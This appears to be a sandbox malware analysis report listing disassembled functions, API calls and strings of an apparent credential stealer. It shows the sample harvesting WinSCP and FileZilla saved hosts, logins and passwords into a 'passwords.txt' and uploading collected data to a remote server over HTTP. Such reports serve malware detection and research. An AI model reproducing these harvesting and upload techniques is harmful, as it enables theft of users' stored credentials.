                                                                                                                                                                                                                                                                            • API String ID: 2238633743-3310253212
                                                                                                                                                                                                                                                                            • Opcode ID: 642cb2aa3f8729086897cfb93ee94fc5d46d0139e4968153179ea6914fe78371
                                                                                                                                                                                                                                                                            • Instruction ID: 407128440629eddd766dc5e7512111eaeb079ed8883c8e88aed7a912d7e36e24
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 642cb2aa3f8729086897cfb93ee94fc5d46d0139e4968153179ea6914fe78371
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 876202BDA10620EFE754DFA5ED98A2637BBF74AB017106529EA05C3374E734A841CF60
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 0040C3F0 Relevance: 96.6, APIs: 40, Strings: 15, Instructions: 370registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C42B
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C44A
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C462
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C47A
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C48D
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C49B
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C4AC
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,"@), ref: 0040C4CE
                                                                                                                                                                                                                                                                            • RegGetValueA.ADVAPI32("@,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040C50F
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32("@), ref: 0040C51D
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32("@), ref: 0040C52D
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,"@), ref: 0040C547
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memset$CloseOpen$Value
                                                                                                                                                                                                                                                                            • String ID: "@$:22$Host: $HostName$Login: $Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                                                                                                            • API String ID: 523579505-1877921674
                                                                                                                                                                                                                                                                            • Opcode ID: fb3acdcaa7eefa8502316789a7024bdd860385d8f84b5ea39cbb2eb7832996cd
                                                                                                                                                                                                                                                                            • Instruction ID: 2eae617b6bbfa68bfe5d41b46deb2d66e6faa0f044e0e836418075379cf6a55f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb3acdcaa7eefa8502316789a7024bdd860385d8f84b5ea39cbb2eb7832996cd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CCD17BB590022DEFDB10DBE4CC85EEFBB7DAB48705F10455AF605A3280D7786E488BA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00404E40 Relevance: 76.1, APIs: 26, Strings: 17, Instructions: 810networkstringmemoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 85 404e40-404f59 call 40fe60 call 404430 call 411720 call 4100c0 lstrlen call 4100c0 call 411720 call 40fe20 * 5 StrCmpCA 108 404f62-404f67 85->108 109 404f5b 85->109 110 404f87-4050ae call 411450 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff50 call 40ffe0 call 40ff00 call 40fea0 * 3 call 40ffe0 call 40ff50 call 40ff00 call 40fea0 * 2 InternetConnectA 108->110 111 404f69-404f81 call 4100c0 InternetOpenA 108->111 109->108 117 4057d5-405814 call 411380 * 2 call 410070 * 4 call 40fe60 110->117 180 4050b4-4050ec HttpOpenRequestA 110->180 111->110 111->117 145 405819-40589e call 40fea0 * 9 117->145 182 4050f2-4050f6 180->182 183 4057ce-4057cf InternetCloseHandle 180->183 184 4050f8-405108 InternetSetOptionA 182->184 185 40510e-405703 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 402450 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 4100c0 lstrlen call 4100c0 lstrlen GetProcessHeap HeapAlloc call 4100c0 lstrlen call 4100c0 memcpy call 4100c0 lstrlen memcpy call 4100c0 lstrlen call 4100c0 * 2 lstrlen memcpy call 4100c0 lstrlen call 4100c0 HttpSendRequestA call 411380 HttpQueryInfoA 182->185 183->117 184->185 392 405705-405714 call 40fe20 185->392 393 405719-40572d call 411350 185->393 392->145 398 405733-40574c InternetReadFile 393->398 399 40589f-4058ae call 40fe20 393->399 400 4057a5-4057bb call 4100c0 StrCmpCA 398->400 401 40574e 398->401 399->145 408 4057c4-4057cb InternetCloseHandle 400->408 409 4057bd-4057be ExitProcess 400->409 404 405750-405755 401->404 404->400 407 405757-4057a3 call 40ffe0 call 40ff00 call 40fea0 InternetReadFile 404->407 407->400 407->404 408->183
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC6
                                                                                                                                                                                                                                                                              • Part of subcall function 00411720: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00411744
                                                                                                                                                                                                                                                                              • Part of subcall function 00411720: GetProcessHeap.KERNEL32(00000000,?,?,00404EBA,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00411753
                                                                                                                                                                                                                                                                              • Part of subcall function 00411720: HeapAlloc.KERNEL32(00000000,?,?,00404EBA,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041175A
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00E39A60,00426897,00426893,0042688B,00426887,00426886), ref: 00404F51
                                                                                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,?,?,?), ref: 00404F77
                                                                                                                                                                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004050A1
                                                                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,00E39900,?,00E39E50,00000000,00000000,-00400100,00000000), ref: 004050E2
                                                                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405108
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00E30030,00000000,?,00426950,00000000,?,?), ref: 00405600
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00405612
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405625
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040562C
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 0040563E
                                                                                                                                                                                                                                                                            • memcpy.MSVCRT ref: 00405652
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?), ref: 0040566B
                                                                                                                                                                                                                                                                            • memcpy.MSVCRT ref: 00405675
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00405686
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040569F
                                                                                                                                                                                                                                                                            • memcpy.MSVCRT ref: 004056AC
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,00000000), ref: 004056C2
                                                                                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004056D3
                                                                                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 004056FB
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 00405744
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 0040579B
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,block), ref: 004057B3
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 004057BE
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004057CF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrlen$Internet$lstrcpy$Heap$HttpProcessmemcpy$AllocFileOpenReadRequestlstrcat$BinaryCloseConnectCrackCryptExitHandleInfoOptionQuerySendString
                                                                                                                                                                                                                                                                            • String ID: ------$"$"$"$"$--$------$------$------$------$0$ERROR$ERROR$`h$block$build_id$file_data
                                                                                                                                                                                                                                                                            • API String ID: 1603122859-2017580602
                                                                                                                                                                                                                                                                            • Opcode ID: 1101776c67f9eaf2207cb236d24d32091fa0778eb9b540aedaa0788034abeadb
                                                                                                                                                                                                                                                                            • Instruction ID: 540930a84d7bb7e5f2c659243df0843e1f0a5bb5435f8e757a205e5e1652ed83
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1101776c67f9eaf2207cb236d24d32091fa0778eb9b540aedaa0788034abeadb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67622E71801149EADB15EBA1C951BEEBBB8AF19304F50407EE601731D2DF786A4CCBB5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 0040C890 Relevance: 73.9, APIs: 31, Strings: 11, Instructions: 398stringmemoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000), ref: 00406EB7
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406ECD
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406EE8
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F01
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F29
                                                                                                                                                                                                                                                                              • Part of subcall function 004116D0: LocalAlloc.KERNEL32(00000040,?,?,00000001,00000004,?,00413C40,00000000,00000000), ref: 004116EC
                                                                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 0040C989
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F,00426B36,00426B33,00426B32,00426B2F), ref: 0040C9DF
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C9E6
                                                                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040CA06
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA11
                                                                                                                                                                                                                                                                              • Part of subcall function 00411B50: malloc.MSVCRT ref: 00411B61
                                                                                                                                                                                                                                                                              • Part of subcall function 00411B50: strncpy.MSVCRT ref: 00411B71
                                                                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040CA48
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA53
                                                                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<User>), ref: 0040CA90
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA9B
                                                                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040CAD8
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CAE7
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CB73
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CB8B
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CBA3
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CBBB
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,Soft: FileZilla), ref: 0040CBD3
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,Host: ), ref: 0040CBE2
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,00000000), ref: 0040CBF5
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,00426F08), ref: 0040CC04
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,00000000), ref: 0040CC17
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,00426F0C), ref: 0040CC26
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,Login: ), ref: 0040CC35
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,00000000), ref: 0040CC48
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,00426F18), ref: 0040CC57
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,Password: ), ref: 0040CC66
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,00000000), ref: 0040CC79
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,00426F28), ref: 0040CC88
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,00426F2C), ref: 0040CC97
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 0040CCDB
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00418083,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CCF1
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040CD42
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcat$lstrlen$lstrcpy$AllocFile$HeapLocalstrtok_s$CloseCreateFolderHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                                                                                                                                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$>kB;kB:kB$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                                                                                            • API String ID: 433178851-2340581703
                                                                                                                                                                                                                                                                            • Opcode ID: 0864dcb1a903e9fa47c799f6ead7014f60aaf1fdb1e7a25ab1264df11e5aa3c5
                                                                                                                                                                                                                                                                            • Instruction ID: d11abaa09dd60fea0b83d1247216ad2e93eb725a93b7f2adba71b57396a44103
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0864dcb1a903e9fa47c799f6ead7014f60aaf1fdb1e7a25ab1264df11e5aa3c5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BAE19275D00218AACB14EBE0DD56BEEBB79AF19304F50046EF501B31D2DF786A08CB69
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00405CE0 Relevance: 56.7, APIs: 21, Strings: 11, Instructions: 681networkstringmemoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 569 405ce0-405dd2 call 40fe60 call 404430 call 40fe20 * 5 call 4100c0 InternetOpenA StrCmpCA 586 405dd4 569->586 587 405ddb-405ddd 569->587 586->587 588 405de3-405f61 call 411450 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff50 call 40ff00 call 40fea0 * 2 InternetConnectA 587->588 589 4064bf-4064e0 InternetCloseHandle call 4100c0 call 406f50 587->589 673 405f67-405f9f HttpOpenRequestA 588->673 674 4064bc 588->674 599 4064e2-40650f call 40feb0 call 40ffe0 call 40ff00 call 40fea0 589->599 600 406514-40659c call 411380 * 2 call 40fea0 * 8 589->600 599->600 675 4064b5-4064b6 InternetCloseHandle 673->675 676 405fa5-405fa9 673->676 674->589 675->674 677 405fc1-406450 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 402450 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 4100c0 lstrlen call 4100c0 lstrlen GetProcessHeap HeapAlloc call 4100c0 lstrlen call 4100c0 memcpy call 4100c0 lstrlen call 4100c0 * 2 lstrlen memcpy call 4100c0 lstrlen call 4100c0 HttpSendRequestA InternetReadFile 676->677 678 405fab-405fbb InternetSetOptionA 676->678 839 406452-406457 677->839 840 4064a8-4064b2 InternetCloseHandle 677->840 678->677 839->840 841 406459-4064a6 call 40ffe0 call 40ff00 call 40fea0 InternetReadFile 839->841 840->675 841->839 841->840
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405DAA
                                                                                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405F54
                                                                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,00E39900,?,00E39E50,00000000,00000000,-00400100,00000000), ref: 00405F94
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,004201C1,?,00000000,004201C1,",00000000,004201C1,mode,00000000,004201C1,00E30030,00000000,004201C1,004269D8), ref: 00406392
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004063A3
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004063AE
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004063B5
